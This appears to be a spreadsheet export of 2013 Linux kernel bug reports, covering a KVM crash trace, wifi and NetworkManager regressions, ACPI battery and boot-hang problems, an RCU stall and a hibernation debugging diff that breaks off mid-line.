0000000000000000 DR2: 0000000000000000 [ 94.586002] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 [ 94.586002] Process qemu-system-x86 (pid: 2132, threadinfo ffff880118d2a000, task ffff8801086e2e80) [ 94.586002] Stack: [ 94.586002] 0000000091800027 ffff880106a70000 ffff880106a79540 0000000000000001 [ 94.586002] 0000000000000008 ffff880118d2bb38 ffff880118d2bb78 ffffffffa010be5f [ 94.586002] ffff880106a79700 0000000800009568 ffff880106a78000 0000000000009188 [ 94.586002] Call Trace: [ 94.586002] [&lt;ffffffffa010be5f&gt;] load_segment_descriptor+0x2ff/0x330 [kvm] [ 94.586002] [&lt;ffffffffa010d4c8&gt;] em_jmp_far+0x38/0x70 [kvm] [ 94.586002] [&lt;ffffffffa0108bd0&gt;] ? check_cr_read+0x40/0x40 [kvm] [ 94.586002] [&lt;ffffffffa010c211&gt;] x86_emulate_insn+0x261/0x1430 [kvm] [ 94.586002] [&lt;ffffffffa010d490&gt;] ? em_lldt+0x30/0x30 [kvm] [ 94.586002] [&lt;ffffffffa00f5ff8&gt;] x86_emulate_instruction+0x98/0x420 [kvm] [ 94.586002] [&lt;ffffffffa016a72d&gt;] vmx_handle_exit+0x20d/0x780 [kvm_intel] [ 94.586002] [&lt;ffffffffa0165dfc&gt;] ? vmx_vcpu_run+0x38c/0x5b0 [kvm_intel] [ 94.586002] [&lt;ffffffffa0110a28&gt;] ? kvm_apic_has_interrupt+0x28/0xd0 [kvm] [ 94.586002] [&lt;ffffffffa01621b0&gt;] ? vmx_invpcid_supported+0x20/0x20 [kvm_intel] [ 94.586002] [&lt;ffffffffa00f3982&gt;] kvm_arch_vcpu_ioctl_run+0x8c2/0x1140 [kvm] [ 94.586002] [&lt;ffffffffa00ef607&gt;] ? kvm_arch_vcpu_load+0x57/0x1e0 [kvm] [ 94.586002] [&lt;ffffffffa00dfcde&gt;] kvm_vcpu_ioctl+0x37e/0x540 [kvm] [ 94.586002] [&lt;ffffffff8109a870&gt;] ? __dequeue_entity+0x30/0x50 [ 94.586002] [&lt;ffffffff811b074a&gt;] do_vfs_ioctl+0x9a/0x550 [ 94.586002] [&lt;ffffffff8164a817&gt;] ? __schedule+0x3d7/0x7b0 [ 94.586002] [&lt;ffffffff811b0ca1&gt;] sys_ioctl+0xa1/0xb0 [ 94.586002] [&lt;ffffffff81654659&gt;] system_call_fastpath+0x16/0x1b [ 94.586002] Code: 41 0f b7 f5 0f b7 55 d0 c1 e6 03 8d 46 07 39 c2 7d 33 41 81 e6 fc ff 00 00 c6 43 28 0d c6 43 29 01 66 44 89 73 2a b8 02 00 00 00 &lt;48&gt; 8b 5d e0 4c 8b 65 e8 4c 8b 6d f0 4c 8b 75 f8 c9 c3 0f 1f 84 [ 94.586002] RIP [&lt;ffffffffa010bb26&gt;] write_segment_descriptor+0x66/0xa0 [kvm] [ 94.586002] RSP &lt;ffff880118d2bac8&gt; [ 94.586002] CR2: 0000000000000034 [ 94.637540] ---[ end trace d23673089dd8f566 ]--- [ 94.639336] ------------[ cut here ]------------ [ 94.640276] kernel BUG at arch/x86/kernel/traps.c:643! [ 94.640276] invalid opcode: 0000 [#2] SMP [ 94.640276] Modules linked in: fuse nfsv3 nfs_acl nfsv4 auth_rpcgss nfs fscache dns_resolver lockd sunrpc 8021q garp stp llc binfmt_misc uinput ppdev parport_pc parport kvm_intel kvm crc32c_intel ghash_clmulni_intel microcode pcspkr e1000 i2c_piix4 floppy(F) cirrus(F) ttm(F) drm_kms_helper(F) drm(F) i2c_core(F) [ 94.640276] CPU 0 [ 94.640276] Pid: 2132, comm: qemu-system-x86 Tainted: GF D 3.8.5 #4 Bochs Bochs [ 94.640276] RIP: 0010:[&lt;ffffffff8164ca16&gt;] [&lt;ffffffff8164ca16&gt;] do_device_not_available+0x16/0x30 [ 94.640276] RSP: 0018:ffffffff81c01d18 EFLAGS: 00010002 [ 94.640276] RAX: 000000008164c301 RBX: 0000000000000001 RCX: ffffffff8164c32c [ 94.640276] RDX: 00000000ffffffff RSI: 0000000000000000 RDI: ffffffff81c01d28 [ 94.640276] RBP: ffffffff81c01d18 R08: ffff8801086e2ef0 R09: 000000000000e910 [ 94.640276] R10: 0000000000000000 R11: 0000000000000000 R12: ffff8801086e2e80 [ 94.640276] R13: ffffffff81c148b0 R14: 0000000000000000 R15: ffff88011fc11980 [ 94.640276] FS: 0000000000000000(0000) GS:ffff88011fc00000(0000) knlGS:0000000000000000 [ 94.640276] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b [ 94.640276] CR2: 0000000000000034 CR3: 00000001069bf000 CR4: 00000000001427f0 [ 94.640276] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 94.640276] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 [ 94.640276] Process qemu-system-x86 (pid: 2132, threadinfo ffff880118d2a000, task ffff8801086e2e80) [ 94.640276] Stack: [ 94.640276] ffffffff81c01e28 ffffffff8165578e ffff88011fc11980 0000000000000000 [ 94.640276] ffffffff81c148b0 ffff8801086e2e80 ffffffff81c01e28 ffffffff81c14420 [ 94.640276] 0000000000000000 0000000000000000 000000000000e910 ffff8801086e2ef0 [ 94.640276] Call Trace: [ 94.640276] Code: f0 c9 c3 66 90 48 2d a8 00 00 00 48 89 87 98 00 00 00 eb c8 90 55 48 89 e5 0f 1f 44 00 00 b0 01 84 c0 75 07 e8 9c 83 9c ff c9 c3 &lt;0f&gt; 0b 0f 1f 84 00 00 00 00 00 eb f6 66 66 66 66 66 2e 0f 1f 84 [ 94.640276] RIP [&lt;ffffffff8164ca16&gt;] do_device_not_available+0x16/0x30 [ 94.640276] RSP &lt;ffffffff81c01d18&gt; [ 94.640276] ---[ end trace d23673089dd8f567 ]--- [ 94.640276] Fixing recursive fault but reboot is needed! [ 125.299855] ------------[ cut here ]------------ [ 125.299855] WARNING: at kernel/watchdog.c:246 watchdog_overflow_callback+0x98/0xc0() [ 125.299855] Hardware name: Bochs [ 125.299855] Watchdog detected hard LOCKUP on cpu 1 [ 125.299855] Modules linked in: fuse nfsv3 nfs_acl nfsv4 auth_rpcgss nfs fscache dns_resolver lockd sunrpc 8021q garp stp llc binfmt_misc uinput ppdev parport_pc parport kvm_intel kvm crc32c_intel ghash_clmulni_intel microcode pcspkr e1000 i2c_piix4 floppy(F) cirrus(F) ttm(F) drm_kms_helper(F) drm(F) i2c_core(F) [ 125.299855] Pid: 0, comm: swapper/1 Tainted: GF D 3.8.5 #4 [ 125.299855] Call Trace: [ 125.299855] &lt;NMI&gt; [&lt;ffffffff8106062f&gt;] warn_slowpath_common+0x7f/0xc0 [ 125.299855] [&lt;ffffffff81060726&gt;] warn_slowpath_fmt+0x46/0x50 [ 125.299855] [&lt;ffffffff810f00c8&gt;] watchdog_overflow_callback+0x98/0xc0 [ 125.299855] [&lt;ffffffff8112c0fc&gt;] __perf_event_overflow+0x9c/0x220 [ 125.299855] [&lt;ffffffff8102500a&gt;] ? x86_perf_event_set_period+0xda/0x170 [ 125.299855] [&lt;ffffffff8112c9a4&gt;] perf_event_overflow+0x14/0x20 [ 125.299855] [&lt;ffffffff8102b2a4&gt;] intel_pmu_handle_irq+0x1c4/0x330 [ 125.299855] [&lt;ffffffff8164db61&gt;] perf_event_nmi_handler+0x21/0x30 [ 125.299855] [&lt;ffffffff8164d2fa&gt;] nmi_handle+0x5a/0x80 [ 125.299855] [&lt;ffffffff8164d41d&gt;] do_nmi+0xfd/0x360 [ 125.299855] [&lt;ffffffff8164c901&gt;] end_repeat_nmi+0x1e/0x2e [ 125.299855] [&lt;ffffffff8164bfa2&gt;] ? _raw_spin_lock+0x22/0x30 [ 125.299855] [&lt;ffffffff8164bfa2&gt;] ? _raw_spin_lock+0x22/0x30 [ 125.299855] [&lt;ffffffff8164bfa2&gt;] ? _raw_spin_lock+0x22/0x30 [ 125.299855] &lt;&lt;EOE&gt;&gt; &lt;IRQ&gt; [&lt;ffffffff810a43f5&gt;] sched_rt_period_timer+0x105/0x320 [ 125.299855] [&lt;ffffffff81088ec0&gt;] __run_hrtimer+0x70/0x1d0 [ 125.299855] [&lt;ffffffff810a42f0&gt;] ? enqueue_rt_entity+0x80/0x80 [ 125.299855] [&lt;ffffffff81089296&gt;] hrtimer_interrupt+0xf6/0x230 [ 125.299855] [&lt;ffffffff816562d9&gt;] smp_apic_timer_interrupt+0x69/0x99 [ 125.299855] [&lt;ffffffff8165521d&gt;] apic_timer_interrupt+0x6d/0x80 [ 125.299855] &lt;EOI&gt; [&lt;ffffffff81045606&gt;] ? native_safe_halt+0x6/0x10 [ 125.299855] [&lt;ffffffff8101d5cf&gt;] default_idle+0x4f/0x1a0 [ 125.299855] [&lt;ffffffff8101ce99&gt;] cpu_idle+0xd9/0x120 [ 125.299855] [&lt;ffffffff81644245&gt;] start_secondary+0x24c/0x24e [ 125.299855] ---[ end trace d23673089dd8f568 ]---</t>
  </si>
  <si>
    <t>wireless broken networkmanager keeps spinning asking for password</t>
  </si>
  <si>
    <t>3.11.0-rc2*</t>
  </si>
  <si>
    <t>2013-08-05 00:19 UTC</t>
  </si>
  <si>
    <t>2013-11-13 16:27 UTC</t>
  </si>
  <si>
    <t>Created attachment 107093 [details] IEEE80211_HT_PARAM.patch on the current mainline the wireless does not connect. network manager just spins and asks for network key password. I have done the bisect(attached)which points to: 30eb1dc2c43039e0fe278e6f3a288de9f216d70d is the first bad commit reverting this does fix the problem. unfortunately reverting on the mainline is to big to do. going through and playing around I found: mlme.c /* check 40 MHz support, if we have it */ if (sband-&gt;ht_cap.cap &amp; IEEE80211_HT_CAP_SUP_WIDTH_20_40) { switch (ht_oper-&gt;ht_param &amp; IEEE80211_HT_PARAM_CHA_SEC_OFFSET) { case IEEE80211_HT_PARAM_CHA_SEC_ABOVE: chandef-&gt;width = NL80211_CHAN_WIDTH_40; chandef-&gt;center_freq1 += 10; break; case IEEE80211_HT_PARAM_CHA_SEC_BELOW: chandef-&gt;width = NL80211_CHAN_WIDTH_40; chandef-&gt;center_freq1 -= 10; break; seems to be the trigger point for my issues over here. changing -= 10; to 15 or 20 on IEEE80211_HT_PARAM_CHA_SEC_BELOW: gets the wireless to work but causes a debug message to appear. after doing some more messing around I found changing: IEEE80211_HT_PARAM_CHA_SEC_BELOW 0x03 to IEEE80211_HT_PARAM_CHA_SEC_BELOW 0x02 gets the wireless working without causing a debug message to appear.(patch attached) as for what is right for this, im not sure.. guess the pro's will have to look at this and make all the changes. let me know and I can try a patch if need be.</t>
  </si>
  <si>
    <t>Connectivity problems with Centrino Ultimate-N 6300 (rev 35) / Dell E6320</t>
  </si>
  <si>
    <t>3.11rc4</t>
  </si>
  <si>
    <t>2013-08-06 18:49 UTC</t>
  </si>
  <si>
    <t>2014-05-08 05:40 UTC</t>
  </si>
  <si>
    <t>With Fedora's 3.11rc* kernels from http://alt.fedoraproject.org/pub/alt/rawhide-kernel-nodebug/x86_64/ I experience connectivity problems with the wireless interface. With Linux-3.10 network-manager immediatly detects a wireless network and starts to connect, while with 3.11rc* the interface is even missing in ifconfig's output. 02:00.0 Network controller: Intel Corporation Centrino Ultimate-N 6300 (rev 35) Subsystem: Intel Corporation Centrino Ultimate-N 6300 3x3 AGN Flags: bus master, fast devsel, latency 0, IRQ 46 Memory at e2d00000 (64-bit, non-prefetchable) [size=8K] Capabilities: [c8] Power Management version 3 Capabilities: [d0] MSI: Enable+ Count=1/1 Maskable- 64bit+ Capabilities: [e0] Express Endpoint, MSI 00 Capabilities: [100] Advanced Error Reporting Capabilities: [140] Device Serial Number 24-77-03-ff-ff-49-06-a8 Kernel driver in use: iwlwifi dmesg-output with 3.11rc4: dmesg | grep iwl [ 11.710829] iwlwifi 0000:02:00.0: can't disable ASPM; OS doesn't have ASPM control [ 11.717439] iwlwifi 0000:02:00.0: irq 46 for MSI/MSI-X dmesg-output with 3.10rc5: dmesg | grep iwl [ 49.328909] iwlwifi 0000:02:00.0: irq 46 for MSI/MSI-X [ 49.335431] iwlwifi 0000:02:00.0: loaded firmware version 9.221.4.1 build 25532 op_mode iwldvm [ 49.388013] iwlwifi 0000:02:00.0: CONFIG_IWLWIFI_DEBUG enabled [ 49.388017] iwlwifi 0000:02:00.0: CONFIG_IWLWIFI_DEBUGFS enabled [ 49.388019] iwlwifi 0000:02:00.0: CONFIG_IWLWIFI_DEVICE_TRACING disabled [ 49.388021] iwlwifi 0000:02:00.0: CONFIG_IWLWIFI_DEVICE_TESTMODE disabled [ 49.388024] iwlwifi 0000:02:00.0: CONFIG_IWLWIFI_P2P disabled [ 49.388026] iwlwifi 0000:02:00.0: Detected Intel(R) Centrino(R) Ultimate-N 6300 AGN, REV=0x74 [ 49.388089] iwlwifi 0000:02:00.0: L1 Enabled; Disabling L0S [ 49.429899] ieee80211 phy0: Selected rate control algorithm 'iwl-agn-rs' [ 53.866439] iwlwifi 0000:02:00.0: L1 Enabled; Disabling L0S [ 53.866637] iwlwifi 0000:02:00.0: Radio type=0x0-0x3-0x1 [ 54.203283] iwlwifi 0000:02:00.0: L1 Enabled; Disabling L0S [ 54.203961] iwlwifi 0000:02:00.0: Radio type=0x0-0x3-0x1</t>
  </si>
  <si>
    <t>The CPU frequency does not raise when compiling packages on Gentoo</t>
  </si>
  <si>
    <t>3.11-rc4</t>
  </si>
  <si>
    <t>2013-08-10 15:02 UTC</t>
  </si>
  <si>
    <t>2013-12-09 08:23 UTC</t>
  </si>
  <si>
    <t>NETWORK ISSUE</t>
  </si>
  <si>
    <t>2.6.32-358.el6.x86_64</t>
  </si>
  <si>
    <t>2013-08-12 13:48 UTC</t>
  </si>
  <si>
    <t>shijinbabu</t>
  </si>
  <si>
    <t>2013-11-13 16:11 UTC</t>
  </si>
  <si>
    <t>Created attachment 107186 [details] output of system-config-network I AM USEING THOSHIBA C85.-P5010 INTEL PENTIUM DUAL CORE LAPTOP I FRESHLY INSTALLED CENTOS 6.4. 64BIT VERSION, BUT I CANT USE INTERNET. HEN I CHECK NETWORKMANGER IN SERVISE SECTION IT IS DEAD AND WHEN I CHECK SYSTEM-CONFIG-NETWORK COMMAND the devise list is empty when i run servise NetwrokManager start then output is [root@localhost Desktop]# service NetworkManager start /etc/init.d/NetworkManager: line 35: /etc/sysconfig/network: No such file or directory [root@localhost Desktop]# service NetworkManager restart /etc/init.d/NetworkManager: line 35: /etc/sysconfig/network: No such file or directory this is output of ifconfig Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:26 errors:0 dropped:0 overruns:0 frame:0 TX packets:26 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:1660 (1.6 KiB) TX bytes:1660 (1.6 KiB) pan0 Link encap:Ethernet HWaddr FA:97:D1:61:5D:04 BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b) virbr0 Link encap:Ethernet HWaddr 52:54:00:1E:BC:C3 inet addr:192.168.122.1 Bcast:192.168.122.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:16 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:0 (0.0 b) TX bytes:3664 (3.5 KiB) virbr0-nic Link encap:Ethernet HWaddr 52:54:00:1E:BC:C3 BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:500 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b) put 00:00.0 Host bridge: Intel Corporation 2nd Generation Core Processor Family DRAM Controller (rev 09) 00:02.0 VGA compatible controller: Intel Corporation 2nd Generation Core Processor Family Integrated Graphics Controller (rev 09) 00:14.0 USB controller: Intel Corporation Panther Point USB xHCI Host Controller (rev 04) 00:16.0 Communication controller: Intel Corporation Panther Point MEI Controller #1 (rev 04) 00:1a.0 USB controller: Intel Corporation Panther Point USB Enhanced Host Controller #2 (rev 04) 00:1b.0 Audio device: Intel Corporation Panther Point High Definition Audio Controller (rev 04) 00:1c.0 PCI bridge: Intel Corporation Panther Point PCI Express Root Port 1 (rev c4) 00:1c.1 PCI bridge: Intel Corporation Panther Point PCI Express Root Port 2 (rev c4) 00:1d.0 USB controller: Intel Corporation Panther Point USB Enhanced Host Controller #1 (rev 04) 00:1f.0 ISA bridge: Intel Corporation Panther Point LPC Controller (rev 04) 00:1f.2 SATA controller: Intel Corporation Panther Point 6 port SATA Controller [AHCI mode] (rev 04) 00:1f.3 SMBus: Intel Corporation Panther Point SMBus Controller (rev 04) 01:00.0 Ethernet controller: Atheros Communications Inc. Device 1090 (rev 10) 02:00.0 Network controller: Realtek Semiconductor Co., Ltd. Device 8723 [root@localhost Desktop]# lspci -n 00:00.0 0600: 8086:0104 (rev 09) 00:02.0 0300: 8086:0106 (rev 09) 00:16.0 0780: 8086:1e3a (rev 04) 00:1a.0 0c03: 8086:1e2d (rev 04) 00:1b.0 0403: 8086:1e20 (rev 04) 00:1c.0 0604: 8086:1e10 (rev c4) 00:1c.1 0604: 8086:1e12 (rev c4) 00:1d.0 0c03: 8086:1e26 (rev 04) 00:1f.0 0601: 8086:1e5e (rev 04) 00:1f.2 0106: 8086:1e03 (rev 04) 00:1f.3 0c05: 8086:1e22 (rev 04) 01:00.0 0200: 1969:1090 (rev 10) 02:00.0 0280: 10ec:8723</t>
  </si>
  <si>
    <t>1286:2044 [Microsoft Surface Pro] Marvell 88W8797 wifi show 3 interface under network manager</t>
  </si>
  <si>
    <t>3.11.0-031100rc5-generic</t>
  </si>
  <si>
    <t>2013-08-15 15:38 UTC</t>
  </si>
  <si>
    <t>thariman</t>
  </si>
  <si>
    <t>2013-11-13 16:09 UTC</t>
  </si>
  <si>
    <t>Under the network management the wifi will show 3 times. When try to connect to an AP with WPA2 it will ask 3 times the passphrase. But unable to connect. You can see: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1212720 for the ubuntu-bug linux report.</t>
  </si>
  <si>
    <t>Asus L4R: Battery is not detected because a parsing error</t>
  </si>
  <si>
    <t>3.8.14</t>
  </si>
  <si>
    <t>2013-08-18 18:36 UTC</t>
  </si>
  <si>
    <t>Daniele Esposti</t>
  </si>
  <si>
    <t>2013-09-05 01:31 UTC</t>
  </si>
  <si>
    <t>Created attachment 107237 [details] dmesg The battery on a Asus L4R laptop is not detected because the following error: ACPI Error: Method parse/execution failed [\_SB_.PCI0.BAT0._STA] (Node f5426600), AE_TIME (20121018/psparse-537)</t>
  </si>
  <si>
    <t>cgroup: [ 4732.348802] INFO: rcu_sched self-detected stall on CPU { 28}  (t=870057 jiffies g=23067 c=23066 q=280880)</t>
  </si>
  <si>
    <t>3.10.6</t>
  </si>
  <si>
    <t>2013-08-19 08:46 UTC</t>
  </si>
  <si>
    <t>Sergey J</t>
  </si>
  <si>
    <t>2013-11-13 15:59 UTC</t>
  </si>
  <si>
    <t>[ 4735.220211] NMI backtrace for cpu 28 [ 4735.220213] CPU: 28 PID: 3088 Comm: cgrulesengd Not tainted 3.10.6-7 #1 [ 4735.220214] Hardware name: Supermicro H8DGU/H8DGU, BIOS 2.0b 05/12/2012 [ 4735.220215] task: ffff8817f361e9f0 ti: ffff8817ebfc2000 task.ti: ffff8817ebfc2000 [ 4735.220216] RIP: 0010:[&lt;ffffffff810325c8&gt;] [&lt;ffffffff810325c8&gt;] native_apic_mem_read+0x8/0x10 [ 4735.220220] RSP: 0018:ffff88201ed03dd0 EFLAGS: 00000096 [ 4735.220220] RAX: 0000000000000400 RBX: 00000000000003e9 RCX: 000000000000001d [ 4735.220221] RDX: 000000000000001d RSI: 0000000000000080 RDI: 0000000000000300 [ 4735.220222] RBP: 000000000000b03a R08: ffffffff817c6e50 R09: 0000000000000000 [ 4735.220223] R10: 0000000000004d10 R11: ffff8817eb380b30 R12: ffffffff817c6e50 [ 4735.220223] R13: 0000000000000400 R14: 0000000000000092 R15: 000000000000004d [ 4735.220225] FS: 00007ff6cf528b40(0000) GS:ffff88201ed00000(0000) knlGS:0000000000000000 [ 4735.220226] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 4735.220226] CR2: 00007ff6cf527000 CR3: 00000017ea8a2000 CR4: 00000000000407e0 [ 4735.220227] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 4735.220228] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 [ 4735.220228] Stack: [ 4735.220229] ffffffff8102d859 ffff8817ebfc2000 0000000000000002 000000000000b03a [ 4735.220231] ffffffff8102e9d7 ffff88201ed03e48 000000000000001d ffff88201ed03e58 [ 4735.220233] 0000000000002710 ffffffff81776f80 ffffffff81777100 000000000000001c [ 4735.220235] Call Trace: [ 4735.220235] &lt;IRQ&gt; [&lt;ffffffff8102d859&gt;] ? native_safe_apic_wait_icr_idle+0x39/0x50 [ 4735.220239] [&lt;ffffffff8102e9d7&gt;] ? default_send_IPI_mask_sequence_phys+0xd7/0xe0 [ 4735.220241] [&lt;ffffffff8102ebb3&gt;] ? arch_trigger_all_cpu_backtrace+0x53/0x90 [ 4735.220244] [&lt;ffffffff810b944b&gt;] ? rcu_check_callbacks+0x1eb/0x5b0 [ 4735.220246] [&lt;ffffffff8108b040&gt;] ? tick_nohz_handler+0xc0/0xc0 [ 4735.220248] [&lt;ffffffff8105532f&gt;] ? update_process_times+0x3f/0x80 [ 4735.220251] [&lt;ffffffff8108b0a6&gt;] ? tick_sched_timer+0x66/0x90 [ 4735.220252] [&lt;ffffffff8106b0a9&gt;] ? __run_hrtimer.isra.31+0x59/0xf0 [ 4735.220255] [&lt;ffffffff8106b8b4&gt;] ? hrtimer_interrupt+0x104/0x260 [ 4735.220257] [&lt;ffffffff8102d973&gt;] ? smp_apic_timer_interrupt+0x63/0xa0 [ 4735.220259] [&lt;ffffffff8158f11d&gt;] ? apic_timer_interrupt+0x6d/0x80 [ 4735.220262] &lt;EOI&gt; [&lt;ffffffff8109ac03&gt;] ? task_cgroup_from_root+0x83/0xa0 [ 4735.220265] [&lt;ffffffff8109aba3&gt;] ? task_cgroup_from_root+0x23/0xa0 [ 4735.220267] [&lt;ffffffff8109cea1&gt;] ? cgroup_attach_task+0xc1/0x3c0 [ 4735.220269] [&lt;ffffffff810f8b00&gt;] ? page_add_new_anon_rmap+0x20/0x100 [ 4735.220271] [&lt;ffffffff810edde0&gt;] ? handle_pte_fault+0x4a0/0xab0 [ 4735.220273] [&lt;ffffffff8109d41f&gt;] ? attach_task_by_pid+0x15f/0x1a0 [ 4735.220275] [&lt;ffffffff8109c57b&gt;] ? cgroup_file_write+0x16b/0x2f0 [ 4735.220277] [&lt;ffffffff8112a38d&gt;] ? __sb_start_write+0x4d/0x110 [ 4735.220279] [&lt;ffffffff81128489&gt;] ? vfs_write+0xc9/0x200 [ 4735.220281] [&lt;ffffffff81128990&gt;] ? SyS_write+0x50/0xa0 [ 4735.220283] [&lt;ffffffff8158e529&gt;] ? system_call_fastpath+0x16/0x1b [ 4735.220285] Code: 5d 41 5c 41 5d 41 5e 41 5f c3 90 90 90 90 90 90 90 90 90 89 ff 89 b7 00 90 5f ff c3 0f 1f 80 00 00 00 00 89 ff 8b 87 00 90 5f ff &lt;c3&gt; 0f 1f 80 00 00 00 00 48 8b 05 39 7f 56 00 c3 0f 1f 84 00 00</t>
  </si>
  <si>
    <t>Sony Laptop Boot hang, unless boot-on-AC or maxcpus=1 or acpi_osi= (REGRESSION BISECTED to mwait_idle()) -- Sony VAIO vgn-c2m Intel T5500</t>
  </si>
  <si>
    <t>3.10.6-200.fc19</t>
  </si>
  <si>
    <t>2013-08-19 19:47 UTC</t>
  </si>
  <si>
    <t>Ian Malone</t>
  </si>
  <si>
    <t>2015-08-28 03:14 UTC</t>
  </si>
  <si>
    <t>Created attachment 107246 [details] dmesg output from successful boot Previously in Fedora bugzilla https://bugzilla.redhat.com/show_bug.cgi?id=991708 My laptop (Sony vgn-c2m/w http://www.sony.co.uk/support/en/product/VGN-C2M_W/specifications Intel Core 2 Duo T5500, Intel 945GM, GMA950 graphics), fails to boot on the most recent Fedora 19 kernels (latest is 3.10.6) when running on battery. Running on PSU boots okay, and disconnecting power after boot is okay. Using acpi=off boots successfully on battery, but can't then read battery level or adjust screen brightness. lspci output below, dmesg (power on boot) and acpidump attachments to follow: lscpi output below, dmesg from successful start with power on attached 00:00.0 Host bridge: Intel Corporation Mobile 945GM/PM/GMS, 943/940GML and 945GT Express Memory Controller Hub (rev 03) 00:02.0 VGA compatible controller: Intel Corporation Mobile 945GM/GMS, 943/940GML Express Integrated Graphics Controller (rev 03) 00:02.1 Display controller: Intel Corporation Mobile 945GM/GMS/GME, 943/940GML Express Integrated Graphics Controller (rev 03) 00:1b.0 Audio device: Intel Corporation NM10/ICH7 Family High Definition Audio Controller (rev 02) 00:1c.0 PCI bridge: Intel Corporation NM10/ICH7 Family PCI Express Port 1 (rev 02) 00:1c.1 PCI bridge: Intel Corporation NM10/ICH7 Family PCI Express Port 2 (rev 02) 00:1c.2 PCI bridge: Intel Corporation NM10/ICH7 Family PCI Express Port 3 (rev 02) 00:1c.3 PCI bridge: Intel Corporation NM10/ICH7 Family PCI Express Port 4 (rev 02) 00:1d.0 USB controller: Intel Corporation NM10/ICH7 Family USB UHCI Controller #1 (rev 02) 00:1d.1 USB controller: Intel Corporation NM10/ICH7 Family USB UHCI Controller #2 (rev 02) 00:1d.2 USB controller: Intel Corporation NM10/ICH7 Family USB UHCI Controller #3 (rev 02) 00:1d.3 USB controller: Intel Corporation NM10/ICH7 Family USB UHCI Controller #4 (rev 02) 00:1d.7 USB controller: Intel Corporation NM10/ICH7 Family USB2 EHCI Controller (rev 02) 00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev e2) 00:1f.0 ISA bridge: Intel Corporation 82801GBM (ICH7-M) LPC Interface Bridge (rev 02) 00:1f.1 IDE interface: Intel Corporation 82801G (ICH7 Family) IDE Controller (rev 02) 00:1f.2 IDE interface: Intel Corporation 82801GBM/GHM (ICH7-M Family) SATA Controller [IDE mode] (rev 02) 00:1f.3 SMBus: Intel Corporation NM10/ICH7 Family SMBus Controller (rev 02) 02:00.0 Ethernet controller: Marvell Technology Group Ltd. 88E8036 PCI-E Fast Ethernet Controller (rev 16) 06:00.0 Network controller: Intel Corporation PRO/Wireless 3945ABG [Golan] Network Connection (rev 02) 0a:03.0 CardBus bridge: Texas Instruments PCIxx12 Cardbus Controller 0a:03.1 FireWire (IEEE 1394): Texas Instruments PCIxx12 OHCI Compliant IEEE 1394 Host Controller 0a:03.2 Mass storage controller: Texas Instruments 5-in-1 Multimedia Card Reader (SD/MMC/MS/MS PRO/xD)</t>
  </si>
  <si>
    <t>Userspace SEGV using latest kernels</t>
  </si>
  <si>
    <t>3.10.8 and 3.11-rc6</t>
  </si>
  <si>
    <t>2013-08-20 21:03 UTC</t>
  </si>
  <si>
    <t>Jeff Shorey</t>
  </si>
  <si>
    <t>2013-11-13 15:55 UTC</t>
  </si>
  <si>
    <t>Created attachment 107257 [details] Java post-mortem dump Running MATLAB startup java (or the installer) results in SEGV. Java post-mortem attached. Only difference is kernel. 3.10.7 is fine, 3.11-rc5 is fine. Running on an i7-3720QM. Maybe the TLB updates which were applied to both kernels? Would have to perform bisection to figure out exactly which patch is causing the problem.</t>
  </si>
  <si>
    <t>ath9k phy0: PLL4 meaurement not done</t>
  </si>
  <si>
    <t>3.10.7</t>
  </si>
  <si>
    <t>2013-08-21 23:06 UTC</t>
  </si>
  <si>
    <t>Otavio Cipriani</t>
  </si>
  <si>
    <t>Created attachment 107277 [details] Call trace Unfortunately I cannot reproduce the problem. I did change the following parameters using sysctl: net.core.rmem_max = 4194304; net.core.wmem_max = 1048576.</t>
  </si>
  <si>
    <t>[PATCH]Hibernation may fails when memory utilization too high</t>
  </si>
  <si>
    <t>3.6.10</t>
  </si>
  <si>
    <t>2013-08-30 05:30 UTC</t>
  </si>
  <si>
    <t>Leon Drugi</t>
  </si>
  <si>
    <t>2013-11-28 02:10 UTC</t>
  </si>
  <si>
    <t>Hello, I use 3.6.10 kernel on Debian Wheezy and have problems with hibernation. I have 16GiB RAM and 50GiB swap. I observed that when current memory utilization (with top command) is 3GiB or more (not exact value, but approximation) then hibernation not working and the system resumes immediatelly. The /var/log/messages file contains the following log: Aug 28 12:51:03 debian kernel: [316490.714902] PM: Syncing filesystems ... done. Aug 28 12:51:03 debian kernel: [316490.976982] Freezing user space processes ... (elapsed 0.01 seconds) done. Aug 28 12:51:03 debian kernel: [316490.990581] PM: Preallocating image memory... Aug 28 12:51:03 debian kernel: [316506.417789] Restarting tasks ... done. I added the following debug messages: $ diff -u kernel/power/snapshot.c.oryg kernel/power/snapshot.c --- kernel/power/snapshot.c.oryg 2013-08-29 09:20:30.879713207 +0200 +++ kernel/power/snapshot.c 2013-08-29 10:38:26.407108689 +0200 @@ -1312,15 +1312,15 @@ printk(KERN_INFO "PM: Preallocating image memory... "); do_gettimeofday(&amp;start); - + printk(KERN_INFO "PM:%d\n",__LINE__); error = memory_bm_create(&amp;orig_bm, GFP_IMAGE, PG_ANY); if (error) goto err_out; - + printk(KERN_INFO "PM:%d\n",__LINE__); error = memory_bm_create(&amp;copy_bm, GFP_IMAGE, PG_ANY); if (error) goto err_out; - + printk(KERN_INFO 